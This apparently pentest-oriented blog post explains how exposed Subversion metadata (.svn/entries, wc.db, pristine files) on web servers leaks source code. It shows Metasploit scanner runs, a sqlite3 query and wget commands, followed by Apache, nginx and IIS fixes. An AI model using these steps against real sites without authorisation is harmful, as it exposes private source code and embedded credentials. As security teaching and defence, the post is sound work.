Monday, March 2, 2015

DevOoops: Revision Control (Subversion)


Subversion 1.6 (and earlier)

Check for .entries files

Walk svn chain to retrieve source

Example:
http://somedomain.com/.svn/text-base/index.php.svn-base
http://somedomain.com/.svn/entries

Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_scanner


msf auxiliary(svn_scanner) > run

[*] Using code '404' as not found.
[+] [1.2.3.52:80] SVN Entries file found.
[*] [1.2.3.52] dir CURRENT [dw394]
[*] - Trying to get file rss2html2.php source code.
[*] - Location: /.svn/text-base/rss2html2.php.svn-base
[*]


Fatal error:  Call to undefined function FeedForAll_scripts_readFile() in /usr/local/apache2-marketing/htdocs/.svn/text-base/rss2html2.php.svn-base on line 772
---SNIP---
[*] Done. 175 records.
[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Unfortunately web servers will usually catch the php and try to render it for you :-(



Once you have the source you look for config files or interesting things in the source code

Example:



Subversion 1.7 and later

Working copy and changes stored in a sqlite database

Example:
http://www.somedomain.com/.svn/wc.db

Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_wcdb_scanner



From the SANS link below example to pull out files on the server

"We have the file name and the SHA1 used by Subversion. With a little SQL-Kung-Fu, we can create a mapping of files used by the application and the files as stored by Subversion."

$ sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;'
index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base
style/style.js|.svn/pristine/2s/2cc5590e0ba024c3db77a13896da09b39ea74799.svn-base
...


Anything with a .svn/pristine should be downloadable:

$ wget -O - http://www.sometarget.tgt/.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
<?php
// This is the index.php file
...

Example:





Great reference for the above:

http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us

Other blog posts on the subject:

https://blog.netspi.com/parsing-svn-entries-files-with-powershell/

Fixes (quick Google searches, didnt test)

Apache



or

RedirectMatch permanent .*\.(svn|git|hg|bzr|cvs)/.* /


nginx

location ~ /.svn/ {
  deny all;
}

.htaccess

RedirectMatch 404 (?i)\.svn

IIS
couple answers here, although none marked as "the answer"
http://serverfault.com/questions/23340/ignoring-svn-directories-under-iis

also http://www.petefreitag.com/item/823.cfm (Great site BTW)


CG

No comments: